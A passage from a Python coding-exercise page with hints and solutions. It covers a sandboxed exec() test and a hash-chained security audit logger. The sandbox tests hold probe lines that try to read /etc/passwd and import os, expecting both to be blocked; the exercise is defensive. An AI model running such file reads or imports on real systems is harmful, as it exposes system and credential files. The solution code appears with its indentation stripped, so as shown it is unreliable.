# Attempt to use open() — should fail
try:
  sandboxed_exec("f = open('/etc/passwd')")
  print("open not blocked!")
except Exception as e:
  print(f"open blocked: True")

# Attempt to use __import__ — should fail
try:
  sandboxed_exec("os = __import__('os')")
  print("import not blocked!")
except Exception as e:
  print(f"import blocked: True")
Expected Output
45
safe code result: 45
open blocked: True
import blocked: True
Hints

Hint 1: Pass {"__builtins__": SAFE_BUILTINS} as the globals dict to exec() — this replaces the full builtins module.

Hint 2: open() and __import__ are not in SAFE_BUILTINS, so accessing them raises NameError.

Hint 3: The sandboxed code runs in local_ns but reads globals from safe_globals — keep them separate.


#11Security Audit LoggerHard
audit-logloggingsecurity-eventssoc2compliance

Build a tamper-evident audit logger with hash-chaining, structured events, and flexible querying.

Solution
import time
import json
import hashlib
from dataclasses import dataclass, field, asdict
from typing import Optional
from copy import deepcopy

@dataclass
class AuditEvent:
event_type: str
actor: str
resource: str
outcome: str
timestamp: float = field(default_factory=time.time)
details: dict = field(default_factory=dict)
event_id: str = ''
chain_hash: str = ''

class AuditLogger:
def __init__(self) -> None:
self._events: list[AuditEvent] = []
self._counter = 0

def _event_to_json(self, event: AuditEvent, include_chain_hash: bool = True) -> str:
d = asdict(event)
if not include_chain_hash:
d.pop('chain_hash', None)
return json.dumps(d, sort_keys=True)

def log(self, event: AuditEvent) -> AuditEvent:
self._counter += 1
event.event_id = f"EVT-{self._counter:04d}"
event.timestamp = event.timestamp or time.time()

# Compute chain hash
if self._events:
prev_json = self._event_to_json(self._events[-1])
else:
prev_json = 'GENESIS'

# Hash prev event JSON + current event (without chain_hash field)
current_json = self._event_to_json(event, include_chain_hash=False)
combined = prev_json + current_json
event.chain_hash = hashlib.sha256(combined.encode()).hexdigest()

self._events.append(deepcopy(event))
return event

def query(
self,
actor: Optional[str] = None,
event_type: Optional[str] = None,
outcome: Optional[str] = None,
) -> list[AuditEvent]:
results = self._events
if actor is not None:
results = [e for e in results if e.actor == actor]
if event_type is not None:
results = [e for e in results if e.event_type == event_type]
if outcome is not None:
results = [e for e in results if e.outcome == outcome]
return results

def verify_chain(self) -> bool:
for i, event in enumerate(self._events):
if i == 0:
prev_json = 'GENESIS'
else:
prev_json = self._event_to_json(self._events[i - 1])
current_json = self._event_to_json(event, include_chain_hash=False)
combined = prev_json + current_json
expected_hash = hashlib.sha256(combined.encode()).hexdigest()
if event.chain_hash != expected_hash:
return False
return True

logger = AuditLogger()

logger.log(AuditEvent('auth.login', 'alice', '/login', 'success'))
logger.log(AuditEvent('data.read', 'alice', '/api/users', 'success'))
logger.log(AuditEvent('auth.login', 'bob', '/login', 'failure', details={'reason': 'bad password'}))
logger.log(AuditEvent('admin.delete','alice', '/api/users/5','denied'))

print(f"total events: {len(logger.query())}")
print(f"alice events: {len(logger.query(actor='alice'))}")
print(f"failures: {len(logger.query(outcome='failure'))}")
print(f"chain intact: {logger.verify_chain()}")

Audit logs and compliance: SOC 2 Type II, PCI-DSS, and HIPAA all require immutable audit trails. Hash-chaining means that even a database admin who can modify records cannot change a historical event without invalidating every subsequent hash — making the tampering detectable. Production audit systems (AWS CloudTrail, Google Cloud Audit Logs) use this pattern with additional signing (asymmetric keys) to prove provenance.

import time
import json
import hashlib
from dataclasses import dataclass, field, asdict
from typing import Optional

@dataclass
class AuditEvent:
  event_type: str          # e.g. 'auth.login', 'data.read', 'admin.delete'
  actor: str               # user/service that performed the action
  resource: str            # what was acted on
  outcome: str             # 'success' | 'failure' | 'denied'
  timestamp: float = field(default_factory=time.time)
  details: dict = field(default_factory=dict)
  event_id: str = ''       # filled by logger
  chain_hash: str = ''     # hash linking to previous event (tamper evidence)

class AuditLogger:
  """
  Immutable audit log with:
  - Sequential event IDs
  - Hash-chaining (each event includes hash of previous) for tamper evidence
  - Structured JSON output
  - Query by actor, event_type, outcome
  """

  def __init__(self) -> None:
      self._events: list[AuditEvent] = []
      self._counter = 0

  def log(self, event: AuditEvent) -> AuditEvent:
      """
      Assign event_id, compute chain_hash, append to log.
      chain_hash = sha256(previous_event_json + current_event_json_without_hash)
      For the first event, previous_event_json = 'GENESIS'.
      """
      pass

  def query(
      self,
      actor: Optional[str] = None,
      event_type: Optional[str] = None,
      outcome: Optional[str] = None,
  ) -> list[AuditEvent]:
      """Return events matching all provided filters (AND logic)."""
      pass

  def verify_chain(self) -> bool:
      """Re-compute each chain_hash and verify the chain is intact."""
      pass

logger = AuditLogger()

logger.log(AuditEvent('auth.login',  'alice', '/login',      'success'))
logger.log(AuditEvent('data.read',   'alice', '/api/users',  'success'))
logger.log(AuditEvent('auth.login',  'bob',   '/login',      'failure', details={'reason': 'bad password'}))
logger.log(AuditEvent('admin.delete','alice', '/api/users/5','denied'))

print(f"total events: {len(logger.query())}")
print(f"alice events: {len(logger.query(actor='alice'))}")
print(f"failures: {len(logger.query(outcome='failure'))}")
print(f"chain intact: {logger.verify_chain()}")
Expected Output
total events: 4
alice events: 3
failures: 1
chain intact: True
Hints

Hint 1: Assign event_id as a zero-padded counter string like "EVT-0001".

Hint 2: For chain_hash: serialize the previous event to JSON, concatenate with current event fields (excluding chain_hash), then sha256.

Hint 3: verify_chain() re-computes each hash and compares to stored — any mismatch returns False.

© 2026 EngineersOfAI. All rights reserved.